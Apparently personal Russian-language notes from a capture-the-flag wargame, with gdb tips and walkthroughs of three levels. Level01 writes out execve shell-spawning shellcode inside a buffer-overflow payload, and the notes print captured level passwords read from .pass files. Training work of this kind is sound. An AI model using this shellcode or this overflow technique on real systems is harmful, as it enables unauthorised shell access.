{\rtf1\ansi\ansicpg1251\cocoartf1671\cocoasubrtf600
{\fonttbl\f0\fswiss\fcharset0 Helvetica;\f1\fnil\fcharset0 HelveticaNeue-Bold;\f2\fnil\fcharset0 HelveticaNeue;
\f3\fswiss\fcharset0 Helvetica-Bold;\f4\fnil\fcharset0 Menlo-Regular;\f5\froman\fcharset0 TimesNewRomanPS-BoldMT;
\f6\froman\fcharset0 TimesNewRomanPSMT;\f7\froman\fcharset0 TimesNewRomanPS-ItalicMT;\f8\fnil\fcharset0 Monaco;
\f9\fnil\fcharset0 Verdana-Bold;\f10\fnil\fcharset0 Verdana;\f11\fnil\fcharset0 Tahoma;
}
{\colortbl;\red255\green255\blue255;\red38\green38\blue38;\red255\green255\blue255;\red60\green60\blue59;
\red250\green252\blue255;\red0\green0\blue173;\red0\green0\blue0;\red184\green184\blue184;\red38\green38\blue38;
\red251\green2\blue255;\red0\green0\blue0;\red132\green221\blue253;\red255\green252\blue171;}
{\*\expandedcolortbl;;\cssrgb\c20000\c20000\c20000;\cssrgb\c100000\c100000\c100000;\cssrgb\c30196\c30196\c29804;
\cssrgb\c98431\c99216\c100000;\cssrgb\c0\c0\c73333;\cssrgb\c0\c0\c0;\cssrgb\c77255\c77255\c77255;\cssrgb\c19608\c19608\c19608;
\cssrgb\c100000\c25279\c100000;\csgray\c0\c0;\cssrgb\c57861\c89157\c99446;\cssrgb\c99995\c98371\c72572;}
{\*\listtable{\list\listtemplateid1\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{none\}}{\leveltext\leveltemplateid1\'00;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid1}
{\list\listtemplateid2\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{disc\}}{\leveltext\leveltemplateid101\'01\uc0\u8226 ;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid2}
{\list\listtemplateid3\listhybrid{\listlevel\levelnfc23\levelnfcn23\leveljc0\leveljcn0\levelfollow0\levelstartat1\levelspace360\levelindent0{\*\levelmarker \{none\}}{\leveltext\leveltemplateid201\'00;}{\levelnumbers;}\fi-360\li720\lin720 }{\listname ;}\listid3}}
{\*\listoverridetable{\listoverride\listid1\listoverridecount0\ls1}{\listoverride\listid2\listoverridecount0\ls2}{\listoverride\listid3\listoverridecount0\ls3}}
\margl1440\margr1440\vieww17340\viewh24360\viewkind0
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5760\tx6480\tx7200\tx7920\tx8640\pardirnatural\partightenfactor0

\f0\fs32 \cf0 15.09.2021\
ssh -p 2222 level02@localhost\
\
**********************************************\
\
\uc0\u1063 \u1090 \u1086 \u1073 \u1099  \u1080 \u1089 \u1087 \u1086 \u1083 \u1100 \u1079 \u1086 \u1074 \u1072 \u1090 \u1100  \u1076 \u1077 \u1073 \u1072 \u1075 \u1077 \u1088  gdb, \u1082 \u1086 \u1084 \u1087 \u1080 \u1083 \u1080 \u1088 \u1091 \u1077 \u1084  \u1089  \u1082 \u1083 \u1102 \u1095 \u1086 \u1084  -g (gcc -g main.c -o main)\
\
\uc0\u1055 \u1088 \u1086 \u1073 \u1088 \u1086 \u1089  \u1087 \u1086 \u1088 \u1090 \u1086 \u1074 
\fs24 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0
\ls1\ilvl0
\f1\b\fs32 \cf2 \cb3 		\expnd0\expndtw0\kerning0
\uc0\u1055 \u1086 \u1088 \u1090  \u1093 \u1086 \u1089 \u1090 \u1072 
\f2\b0 \'a0\'96 \uc0\u1083 \u1102 \u1073 \u1086 \u1081  \u1089 \u1074 \u1086 \u1073 \u1086 \u1076 \u1085 \u1099 \u1081  \u1087 \u1086 \u1088 \u1090  \u1042 \u1072 \u1096 \u1077 \u1075 \u1086  \u1082 \u1086 \u1084 \u1087 \u1100 \u1102 \u1090 \u1077 \u1088 \u1072 ,\
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0
\ls1\ilvl0\cf2 \kerning1\expnd0\expndtw0 		\expnd0\expndtw0\kerning0
\uc0\u1082 \u1086 \u1090 \u1086 \u1088 \u1099 \u1081  \u1073 \u1091 \u1076 \u1077 \u1090  \u1080 \u1089 \u1087 \u1086 \u1083 \u1100 \u1079 \u1086 \u1074 \u1072 \u1090 \u1100 \u1089 \u1103  \u1076 \u1083 \u1103  \u1087 \u1077 \u1088 \u1077 \u1085 \u1072 \u1087 \u1088 \u1072 \u1074 \u1083 \u1077 \u1085 \u1080 \u1103  \u1085 \u1072  \u1085 \u1091 \u1078 \u1085 \u1099 \u1081  \u1087 \u1086 \u1088 \u1090 \
\ls1\ilvl0\kerning1\expnd0\expndtw0 		\expnd0\expndtw0\kerning0
\uc0\u1074  \u1075 \u1086 \u1089 \u1090 \u1077 \u1074 \u1086 \u1081  \u1054 \u1057 . \u1053 \u1072 \u1087 \u1088 \u1080 \u1084 \u1077 \u1088 , 2222;\cb1 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0
\ls1\ilvl0
\f1\b \cf2 \cb3 \kerning1\expnd0\expndtw0 		\
		\expnd0\expndtw0\kerning0
IP \uc0\u1075 \u1086 \u1089 \u1090 \u1103 
\f2\b0 \'a0\'96 \uc0\u1079 \u1076 \u1077 \u1089 \u1100  \u1091 \u1082 \u1072 \u1079 \u1099 \u1074 \u1072 \u1077 \u1084  IP \u1072 \u1076 \u1088 \u1077 \u1089  \u1075 \u1086 \u1089 \u1090 \u1077 \u1074 \u1086 \u1081  \u1086 \u1087 \u1077 \u1088 \u1072 \u1094 \u1080 \u1086 \u1085 \u1085 \u1086 \u1081  \u1089 \u1080 \u1089 \u1090 \u1077 \u1084 \u1099 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0
\ls1\ilvl0\cf2 \kerning1\expnd0\expndtw0 		\expnd0\expndtw0\kerning0
\uc0\u1085 \u1072  \u1082 \u1086 \u1090 \u1086 \u1088 \u1099 \u1081  \u1073 \u1091 \u1076 \u1077 \u1090  \u1087 \u1088 \u1086 \u1080 \u1089 \u1093 \u1086 \u1076 \u1080 \u1090 \u1100  \u1087 \u1077 \u1088 \u1077 \u1085 \u1072 \u1087 \u1088 \u1072 \u1074 \u1083 \u1077 \u1085 \u1080 \u1077  (10.2.0.15)\
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0
\ls1\ilvl0\cf2 \cb1 \kerning1\expnd0\expndtw0 		\expnd0\expndtw0\kerning0
\
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0
\ls1\ilvl0
\f1\b \cf2 \cb3 \kerning1\expnd0\expndtw0 		\expnd0\expndtw0\kerning0
\uc0\u1055 \u1086 \u1088 \u1090  \u1075 \u1086 \u1089 \u1090 \u1103 
\f2\b0 \'a0\'96 \uc0\u1087 \u1086 \u1088 \u1090  \u1075 \u1086 \u1089 \u1090 \u1077 \u1074 \u1086 \u1081  \u1054 \u1057 , \u1085 \u1072  \u1082 \u1086 \u1090 \u1086 \u1088 \u1099 \u1081  \u1085 \u1072 \u1084  \u1085 \u1077 \u1086 \u1073 \u1093 \u1086 \u1076 \u1080 \u1084 \u1086 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0
\ls1\ilvl0\cf2 \kerning1\expnd0\expndtw0 		\expnd0\expndtw0\kerning0
\uc0\u1087 \u1088 \u1086 \u1073 \u1088 \u1072 \u1089 \u1099 \u1074 \u1072 \u1090 \u1100  \u1085 \u1072 \u1096 \u1080  \u1079 \u1072 \u1087 \u1088 \u1086 \u1089 \u1099 . \u1042  \u1085 \u1072 \u1096 \u1077 \u1084  \u1089 \u1083 \u1091 \u1095 \u1072 \u1077  \u1101 \u1090 \u1086  4242 \u1087 \u1086 \u1088 \u1090 , \u1082 \u1086 \u1090 \u1086 \u1088 \u1099 \u1081 \
\ls1\ilvl0\kerning1\expnd0\expndtw0 		\expnd0\expndtw0\kerning0
\uc0\u1087 \u1088 \u1086 \u1089 \u1083 \u1091 \u1096 \u1080 \u1074 \u1072 \u1077 \u1090  SSH \u1089 \u1077 \u1088 \u1074 \u1077 \u1088 .\
\pard\tx720\pardeftab720\qj\partightenfactor0
\cf2 \cb1 \
\uc0\u1050 \u1086 \u1084 \u1072 \u1085 \u1076 \u1099 \
\pard\pardeftab720\sl320\partightenfactor0

\f3\b\fs28 \cf2 \cb3 objdump\
coredump 
\f0\b0 - \uc0\u1086 \u1073 \u1088 \u1072 \u1079  \u1087 \u1072 \u1084 \u1103 \u1090 \u1080  \u1074  \u1084 \u1086 \u1084 \u1077 \u1085 \u1090  \u1082 \u1086 \u1075 \u1076 \u1072  \u1087 \u1088 \u1086 \u1094 \u1077 \u1089 \u1089  \u1091 \u1087 \u1072 \u1083 \
\pard\pardeftab720\sl320\partightenfactor0

\f4 \cf4 \cb5 x/i - \uc0\u1080 \u1085 \u1089 \u1090 \u1088 \u1091 \u1082 \u1094 \u1080 \u1103 \
x/x - hex\
x/s - \uc0\u1089 \u1090 \u1088 \u1086 \u1082 \u1072 \
x/a - \uc0\u1072 \u1076 \u1088 \u1077 \u1089 \
\pard\pardeftab720\sl360\partightenfactor0

\fs26 \cf6 \cb3 mov \uc0\u1087 \u1088 \u1080 \u1077 \u1084 \u1085 \u1080 \u1082 , \u1080 \u1089 \u1090 \u1086 \u1095 \u1085 \u1080 \u1082  (\u1082 \u1086 \u1087 \u1080 \u1088 \u1086 \u1074 \u1072 \u1085 \u1080 \u1077 )\
\pard\tx220\tx720\pardeftab720\li720\fi-720\sl320\qj\partightenfactor0
\ls2\ilvl0
\f5\b\fs28 \cf7 \cb1 \kerning1\expnd0\expndtw0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
ESI/SI
\f6\b0 \'a0(
\f7\i source index register
\f6\i0 ) \'96 \uc0\u1080 \u1085 \u1076 \u1077 \u1082 \u1089  \u1080 \u1089 \u1090 \u1086 \u1095 \u1085 \u1080 \u1082 \u1072 ;\
\ls2\ilvl0
\f5\b \kerning1\expnd0\expndtw0 {\listtext	\uc0\u8226 	}\expnd0\expndtw0\kerning0
EDI/DI
\f6\b0 \'a0(
\f7\i destination index register
\f6\i0 ) \'96 \uc0\u1080 \u1085 \u1076 \u1077 \u1082 \u1089  \u1087 \u1088 \u1080 \u1105 \u1084 \u1085 \u1080 \u1082 \u1072  (\u1087 \u1086 \u1083 \u1091 \u1095 \u1072 \u1090 \u1077 \u1083 \u1103 );\
\pard\pardeftab720\sl340\partightenfactor0

\f2\fs30 \cf8 \cb9 \uc0\u1045 \u1089 \u1090 \u1100  \u1090 \u1088 \u1080  \u1086 \u1089 \u1085 \u1086 \u1074 \u1085 \u1099 \u1093  \u1088 \u1077 \u1075 \u1080 \u1089 \u1090 \u1088 \u1072  \u1082 \u1086 \u1090 \u1086 \u1088 \u1099 \u1077  \u1080 \u1089 \u1087 \u1086 \u1083 \u1100 \u1079 \u1091 \u1102 \u1090 \u1089 \u1103  \u1087 \u1088 \u1080  \u1088 \u1072 \u1073 \u1086 \u1090 \u1077 .\
* \uc0\u1056 \u1077 \u1075 \u1080 \u1089 \u1090 \u1088 \'a0
\f1\b EIP
\f2\b0 \'a0- \uc0\u1091 \u1082 \u1072 \u1079 \u1099 \u1074 \u1072 \u1077 \u1090  \u1085 \u1072  \u1072 \u1076 \u1088 \u1077 \u1089  \u1074  \u1087 \u1072 \u1084 \u1103 \u1090 \u1080 , \u1082 \u1072 \u1082 \u1072 \u1103  \u1080 \u1085 \u1089 \u1090 \u1088 \u1091 \u1082 \u1094 \u1080 \u1103  (\u1082 \u1086 \u1084 \u1072 \u1085 \u1076 \u1072 ) \u1076 \u1086 \u1083 \u1078 \u1085 \u1072  \u1074 \u1099 \u1087 \u1086 \u1083 \u1085 \u1080 \u1090 \u1089 \u1103  \u1089 \u1083 \u1077 \u1076 \u1091 \u1102 \u1097 \u1077 \u1081 .\
* \uc0\u1056 \u1077 \u1075 \u1080 \u1089 \u1090 \u1088 \'a0
\f1\b ESP
\f2\b0 \'a0- \uc0\u1091 \u1082 \u1072 \u1079 \u1099 \u1074 \u1072 \u1077 \u1090  \u1085 \u1072  \u1074 \u1077 \u1088 \u1096 \u1080 \u1085 \u1091  \u1089 \u1090 \u1077 \u1082 \u1072  (\u1072 \u1076 \u1088 \u1077 \u1089  \u1074  \u1087 \u1072 \u1084 \u1103 \u1090 \u1080 ).\
* \uc0\u1056 \u1077 \u1075 \u1080 \u1089 \u1090 \u1088 \'a0
\f1\b EBP
\f2\b0 \'a0- \uc0\u1091 \u1082 \u1072 \u1079 \u1099 \u1074 \u1072 \u1077 \u1090  \u1085 \u1072  \u1089 \u1090 \u1077 \u1082 \u1086 \u1074 \u1099 \u1081  \u1092 \u1088 \u1077 \u1081 \u1084  (\u1082 \u1072 \u1082  \u1087 \u1077 \u1088 \u1077 \u1084 \u1077 \u1085 \u1085 \u1099 \u1077  \u1080  \u1072 \u1088 \u1075 \u1091 \u1084 \u1077 \u1085 \u1090 \u1099  \u1088 \u1072 \u1089 \u1087 \u1086 \u1083 \u1072 \u1075 \u1072 \u1102 \u1090 \u1089 \u1103  \u1074  \u1087 \u1072 \u1084 \u1103 \u1090 \u1080 ).\
\
\pard\pardeftab720\sl360\partightenfactor0

\f8\fs27 \cf8 stepi
\f2\fs30 \'a0- \uc0\u1082 \u1086 \u1084 \u1072 \u1085 \u1076 \u1072  \u1074 \u1099 \u1087 \u1086 \u1083 \u1085 \u1080 \u1090  \u1088 \u1086 \u1074 \u1085 \u1086  \u1086 \u1076 \u1085 \u1091  \u1080 \u1085 \u1089 \u1090 \u1088 \u1091 \u1082 \u1094 \u1080 \u1102  \u1087 \u1088 \u1086 \u1094 \u1077 \u1089 \u1089 \u1086 \u1088 \u1072  \u1080  \u1086 \u1089 \u1090 \u1072 \u1085 \u1086 \u1074 \u1080 \u1090 \u1089 \u1103  \u1085 \u1072  \u1089 \u1083 \u1077 \u1076 \u1091 \u1102 \u1097 \u1077 \u1081 .\
\pard\pardeftab720\sl340\partightenfactor0
\cf8 \
\pard\pardeftab720\sl360\partightenfactor0

\f8\fs27 \cf8 nexti
\f2\fs30 \'a0\uc0\u1074 \u1099 \u1087 \u1086 \u1083 \u1085 \u1080 \u1090  \u1090 \u1086 \u1078 \u1077  \u1086 \u1076 \u1085 \u1091  \u1080 \u1085 \u1089 \u1090 \u1088 \u1091 \u1082 \u1094 \u1080 \u1102  \u1085 \u1086  \u1087 \u1077 \u1088 \u1077 \u1087 \u1088 \u1099 \u1075 \u1085 \u1077 \u1090 , \u1077 \u1089 \u1083 \u1080  \u1089 \u1083 \u1077 \u1076 \u1091 \u1102 \u1097 \u1072 \u1103  \u1080 \u1085 \u1089 \u1090 \u1088 \u1091 \u1082 \u1094 \u1080 \u1103  \u1073 \u1091 \u1076 \u1077 \u1090  \u1087 \u1086 \u1076 \u1087 \u1088 \u1086 \u1075 \u1088 \u1072 \u1084 \u1086 \u1081  - \u1092 \u1091 \u1085 \u1082 \u1094 \u1080 \u1077 \u1081  (call)\
\pard\pardeftab720\sl360\partightenfactor0

\fs32 \cf2 \cb1 \
\
\pard\pardeftab720\sl380\partightenfactor0

\f9\b \cf7 \cb3 \uc0\u1048 \u1085 \u1089 \u1090 \u1088 \u1091 \u1082 \u1094 \u1080 \u1103  RET
\f10\b0 \'a0\uc0\u1074  \u1040 \u1089 \u1089 \u1077 \u1084 \u1073 \u1083 \u1077 \u1088 \u1077  \u1074 \u1099 \u1087 \u1086 \u1083 \u1085 \u1103 \u1077 \u1090  \u1074 \u1086 \u1079 \u1074 \u1088 \u1072 \u1090  \u1080 \u1079  \u1073 \u1083 \u1080 \u1078 \u1085 \u1077 \u1081  \u1087 \u1088 \u1086 \u1094 \u1077 \u1076 \u1091 \u1088 \u1099  (
\f9\b RET
\f10\b0 URN)\

\f2 \cf2 \cb1 \
GDB:\
\pard\tx720\pardeftab720\qj\partightenfactor0
\cf2 1. \uc0\u1048 \u1079  \u1096 \u1077 \u1089 \u1090 \u1085 \u1072 \u1076 \u1094 \u1072 \u1090 \u1077 \u1088 \u1080 \u1095 \u1085 \u1099 \u1081  \u1074  \u1076 \u1077 \u1089 \u1103 \u1090 \u1080 \u1095 \u1085 \u1091 \u1102 :\
\pard\tx720\pardeftab720\qj\partightenfactor0

\f1\b \cf2 (gdb) p 0x149c
\f2\b0 \
$4 = 5276\
\
2. \uc0\u1042 \u1099 \u1074 \u1077 \u1089 \u1090 \u1080  \u1088 \u1077 \u1075 \u1080 \u1089 \u1090 \u1088 \u1099 \

\f1\b (gdb) info r
\f2\b0 \
\
3. \uc0\u1042 \u1099 \u1074 \u1077 \u1089 \u1090 \u1080  \u1089 \u1086 \u1076 \u1077 \u1088 \u1078 \u1080 \u1084 \u1086 \u1077  \u1089 \u1090 \u1077 \u1082 \u1072 \

\f1\b (gdb) where\
\
\pard\tx720\pardeftab720\qj\partightenfactor0

\f2\b0 \cf2 4. \uc0\u1058 \u1077 \u1082 \u1091 \u1097 \u1072 \u1103  \u1080 \u1085 \u1089 \u1090 \u1088 \u1091 \u1082 \u1094 \u1080 \u1103 
\f1\b \
(gdb) disas\
\

\f2\b0 5. \uc0\u1047 \u1072 \u1087 \u1091 \u1089 \u1090 \u1080 \u1090 \u1100  \u1087 \u1088 \u1086 \u1075 \u1088 \u1072 \u1084 \u1084 \u1091  \u1074  \u1086 \u1090 \u1083 \u1072 \u1076 \u1095 \u1080 \u1082 \u1077 
\f1\b \
(gdb) run (r)\
\

\f2\b0 5. \uc0\u1059 \u1089 \u1090 \u1072 \u1085 \u1086 \u1074 \u1080 \u1090 \u1100  \u1073 \u1088 \u1077 \u1081 \u1087 \u1086 \u1080 \u1085 \u1090  (\u1084 \u1086 \u1078 \u1085 \u1086  \u1091 \u1089 \u1090 \u1072 \u1085 \u1072 \u1074 \u1083 \u1080 \u1074 \u1072 \u1090 \u1100  \u1073 \u1088 \u1077 \u1081 \u1082 \u1087 \u1086 \u1080 \u1085 \u1090  \u1087 \u1086  \u1072 \u1076 \u1088 \u1077 \u1089 \u1091  b *0x40056d)
\f1\b \
(gdb) break main (b main)\
\

\f2\b0 5. \uc0\u1059 \u1076 \u1072 \u1083 \u1080 \u1090 \u1100  1\u1081  \u1073 \u1088 \u1077 \u1081 \u1082 \u1087 \u1086 \u1080 \u1085 \u1090 
\f1\b \
(gdb) disable 1\
\

\f2\b0 5. \uc0\u1055 \u1086 \u1082 \u1072 \u1079 \u1072 \u1090 \u1100  \u1088 \u1077 \u1075 \u1080 \u1089 \u1090 \u1088 \u1099 
\f1\b \
(gdb) i r (info registers)\
\

\f2\b0 6. \uc0\u1042 \u1099 \u1074 \u1086 \u1076  \u1079 \u1085 \u1072 \u1095 \u1077 \u1085 \u1080 \u1077  \u1087 \u1086  \u1072 \u1076 \u1088 \u1077 \u1089 \u1091 
\f1\b \
(gdb) x 0x400634 (\uc0\u1074 \u1099 \u1074 \u1077 \u1089 \u1090 \u1080  4 \u1073 \u1072 \u1081 \u1090 \u1072  \u1087 \u1086  \u1072 \u1076 \u1088 \u1077 \u1089 \u1091 )\
(gdb) x/2x 0x400634 (\uc0\u1074 \u1099 \u1074 \u1077 \u1089 \u1090 \u1080  8 \u1073 \u1072 \u1081 \u1090 \u1086 \u1074  \u1087 \u1086  \u1072 \u1076 \u1088 \u1077 \u1089 \u1091 ) \u1080 \u1083 \u1080  x/2 0x400634\
(gdb) x/2d 0x400634 (\uc0\u1074 \u1099 \u1074 \u1077 \u1089 \u1090 \u1080  8 \u1073 \u1072 \u1081 \u1090 \u1086 \u1074  \u1087 \u1086  \u1072 \u1076 \u1088 \u1077 \u1089 \u1091  \u1074  \u1076 \u1077 \u1089 \u1103 \u1090 \u1080 \u1095 \u1085 \u1086 \u1084  \u1074 \u1080 \u1076 \u1077 ) \
\

\f2\b0 5. \uc0\u1042 \u1099 \u1087 \u1086 \u1083 \u1085 \u1080 \u1090 \u1100  \u1088 \u1086 \u1074 \u1085 \u1086  \u1086 \u1076 \u1085 \u1091  \u1080 \u1085 \u1089 \u1090 \u1088 \u1091 \u1082 \u1094 \u1080 \u1102  (\u1077 \u1089 \u1083 \u1080  call \u1090 \u1086  \u1087 \u1088 \u1086 \u1074 \u1072 \u1083 \u1080 \u1084 \u1089 \u1103  \u1074 \u1086  \u1074 \u1085 \u1091 \u1090 \u1088 \u1100 )
\f1\b \
(gdb) stepi\
(gdb) nexti (\uc0\u1087 \u1077 \u1088 \u1077 \u1096 \u1072 \u1075 \u1085 \u1077 \u1090  \u1074 \u1099 \u1079 \u1086 \u1074  call)\
\

\f2\b0 5. \uc0\u1042  \u1092 \u1086 \u1088 \u1084 \u1072 \u1090  intel
\f1\b \
(gdb) set disassembly -flavor intel\
\

\f2\b0 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0
\ls3\ilvl0\cf2 ******************************************************\
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0
\ls3\ilvl0\cf2 \kerning1\expnd0\expndtw0 		\expnd0\expndtw0\kerning0
\
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0
\ls3\ilvl0
\f1\b \cf10 LEVEL00
\f2\b0 \cf2 \
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0
\ls3\ilvl0\cf2 \kerning1\expnd0\expndtw0 		\expnd0\expndtw0\kerning0
\
level00@OverRide:~$ ./level00\
***********************************\
* 	     -Level00 -		  *\
***********************************\
Password:\
\ls3\ilvl0\kerning1\expnd0\expndtw0 		\expnd0\expndtw0\kerning0
\
\uc0\u1042 \u1080 \u1076 \u1080 \u1084 , \u1095 \u1090 \u1086  \u1090 \u1088 \u1077 \u1073 \u1091 \u1077 \u1090 \u1089 \u1103  \u1074  \u1087 \u1072 \u1088 \u1086 \u1083 \u1100 .\
\ls3\ilvl0\kerning1\expnd0\expndtw0 		\expnd0\expndtw0\kerning0
\
$ gdb level00\
\ls3\ilvl0\kerning1\expnd0\expndtw0 		\expnd0\expndtw0\kerning0
\
\uc0\u1042  main \u1087 \u1088 \u1086 \u1080 \u1089 \u1093 \u1086 \u1076 \u1080 \u1090  \u1089 \u1088 \u1072 \u1074 \u1085 \u1077 \u1085 \u1080 \u1077  \u1089 \u1090 \u1088 \u1086 \u1082 \u1080 , \u1087 \u1086 \u1076 \u1072 \u1085 \u1085 \u1086 \u1081  \u1085 \u1072 \u1084 \u1080  \u1074  \u1082 \u1072 \u1095 \u1077 \u1089 \u1090 \u1074 \u1077  \
\uc0\u1087 \u1072 \u1088 \u1086 \u1083 \u1103  \u1089  0x149c, \u1095 \u1090 \u1086  \u1089 \u1086 \u1086 \u1090 \u1074 \u1077 \u1090 \u1089 \u1090 \u1074 \u1091 \u1077 \u1090   
\f11\fs28 \cf7 \cb3 5276 \uc0\u1074  \u1076 \u1077 \u1089 \u1103 \u1090 \u1080 \u1095 \u1085 \u1086 \u1081 .
\f2\fs32 \cf2 \cb1 \
\ls3\ilvl0\kerning1\expnd0\expndtw0 		\
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0
\ls3\ilvl0\cf2 \expnd0\expndtw0\kerning0
0x080484e7 <+83>:	cmp    $0x149c,%eax\
\pard\tx720\pardeftab720\qj\partightenfactor0
\cf2 \
\uc0\u1045 \u1089 \u1083 \u1080  \u1087 \u1086 \u1076 \u1072 \u1077 \u1090 \u1089 \u1103  \u1095 \u1090 \u1086 -\u1090 \u1086  \u1076 \u1088 \u1091 \u1075 \u1086 \u1077  \u1090 \u1086  \u1082 \u1086 \u1084 \u1072 \u1085 \u1076 \u1072  jne \u1087 \u1077 \u1088 \u1077 \u1073 \u1088 \u1072 \u1089 \u1099 \u1074 \u1072 \u1077 \u1090 \u1089 \u1103  \
\uc0\u1084 \u1080 \u1084 \u1086  \u1085 \u1077 \u1086 \u1073 \u1093 \u1086 \u1076 \u1080 \u1084 \u1086 \u1081  \u1082 \u1086 \u1084 \u1072 \u1085 \u1076 \u1099  system.\
\
0x080484ec <+88>:	 jne    0x804850d <main+121>\
\
$ ./level00\
***********************************\
* 	     -Level00 -		  *\
***********************************\
Password:5276\
\
Authenticated!\
\
$ cat /home/users/level01/.pass\
\pard\tx720\pardeftab720\qj\partightenfactor0
\cf10 \cb11 uSq2ehEGT6c9S24zbshexZQBXUGrncxn5sD5QfGL\
\
\
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0

\f1\b \cf10 \cb1 LEVEL01
\f2\b0 \cb11 \
\pard\tx720\pardeftab720\qj\partightenfactor0
\cf2 \cb1 \
 (cat /tmp/user ; cat) | ./level01\
\
python -c "print 'dat_wil' + '\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x89\\xc1\\x89\\xc2\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\x40\\xcd\\x80' + '\\n' + 'A'*80 + '\\x08\\x04\\xa0\\x47'[::-1]" > /tmp/test\
\
level01@OverRide:~$ cat /tmp/test - | ./level01\
\
whoami\
level02\
cat /home/users/level02/.pass\
PwBLgNa8p8MTKW57S7zxVAQCxnCpV8JqTTs9XEBv\
\
\
\pard\tx220\tx720\pardeftab720\li720\fi-720\qj\partightenfactor0

\f1\b \cf10 LEVEL02\
\
***********************\
\pard\tx720\pardeftab720\qj\partightenfactor0

\f2\b0 \cf2 \uc0\u1063 \u1090 \u1086 \u1073 \u1099  \u1087 \u1088 \u1086 \u1089 \u1083 \u1077 \u1076 \u1080 \u1090 \u1100  \u1093 \u1086 \u1076  \u1074 \u1099 \u1087 \u1086 \u1083 \u1085 \u1077 \u1085 \u1080 \u1103  \u1087 \u1088 \u1086 \u1075 \u1088 \u1072 \u1084 \u1084 \u1099 , \u1089 \u1086 \u1079 \u1076 \u1072 \u1076 \u1080 \u1084  \u1092 \u1072 \u1081 \u1083 : \
\
python -c \'93print \'91A\'92*40 \'94 > /tmp/test      \
(\uc0\u1044 \u1083 \u1080 \u1085 \u1072  \u1076 \u1072 \u1085 \u1085 \u1099 \u1093  \u1074  \u1087 \u1088 \u1086 \u1075 \u1088 \u1072 \u1084 \u1084 \u1077  \u1088 \u1072 \u1074 \u1085 \u1072  \u1076 \u1083 \u1080 \u1085 \u1077  \u1086 \u1073 \u1099 \u1095 \u1085 \u1086 \u1075 \u1086  \u1087 \u1072 \u1088 \u1086 \u1083 \u1103  40 \u1073 \u1072 \u1081 \u1090 . \
\uc0\u1053 \u1077 \u1086 \u1073 \u1093 \u1086 \u1076 \u1080 \u1084 \u1086 , \u1095 \u1090 \u1086 \u1073 \u1099  \u1087 \u1088 \u1086 \u1081 \u1090 \u1080  \u1087 \u1088 \u1086 \u1074 \u1077 \u1088 \u1082 \u1091 \
\
0x0000000000400925 <+273>:	cmpl   	$0x29,-0xc(%rbp)\
0x0000000000400929 <+277>:	je     		0x40097d <main+361> \
\
\uc0\u1042  \u1086 \u1090 \u1083 \u1072 \u1076 \u1095 \u1080 \u1082 \u1077  \u1091 \u1089 \u1090 \u1072 \u1085 \u1086 \u1074 \u1080 \u1084  \u1072 \u1088 \u1075 \u1091 \u1084 \u1077 \u1085 \u1090 :\
(gdb) set args arg1 /tmp/test\
\
\uc0\u1059 \u1089 \u1090 \u1072 \u1085 \u1086 \u1074 \u1080 \u1084  \u1073 \u1088 \u1077 \u1081 \u1082 \u1087 \u1086 \u1080 \u1085 \u1090  \u1087 \u1077 \u1088 \u1077 \u1076  \u1074 \u1099 \u1079 \u1086 \u1074 \u1086 \u1084  fopen, \u1095 \u1090 \u1086 \u1073 \u1099  \u1087 \u1086 \u1076 \u1084 \u1077 \u1085 \u1080 \u1090 \u1100  \u1079 \u1085 \u1072 \u1095 \u1077 \u1085 \u1080 \u1077  \u1088 \u1077 \u1075 \u1080 \u1089 \u1090 \u1088 \u1072 . \
\uc0\u1055 \u1086  \u1091 \u1084 \u1086 \u1083 \u1095 \u1072 \u1085 \u1080 \u1102  \u1073 \u1091 \u1076 \u1077 \u1084  \u1087 \u1099 \u1090 \u1072 \u1090 \u1100 \u1089 \u1103  \u1086 \u1090 \u1082 \u1088 \u1099 \u1090 \u1100  \u1092 \u1072 \u1081 \u1083  /home/users/level03/.pass, \u1085 \u1072 \u1084  \u1085 \u1091 \u1078 \u1085 \u1086  \u1087 \u1086 \u1076 \u1084 \u1077 \u1085 \u1080 \u1090 \u1100  \u1085 \u1072  \u1089 \u1074 \u1086 \u1081 .\
\
0x00000000004008a5 <+145>:	mov    %rax,%rdi\
(gdb) b *0x00000000004008a5\
(gdb) r\
\cb12 (gdb) set $rax=0x7fffffffe8bd (\uc0\u1040 \u1076 \u1088 \u1077 \u1089  \u1087 \u1083 \u1072 \u1074 \u1072 \u1102 \u1097 \u1080 \u1081 , \u1084 \u1086 \u1078 \u1077 \u1090  \u1084 \u1077 \u1085 \u1103 \u1090 \u1100 \u1089 \u1103 )\cb1 \
\
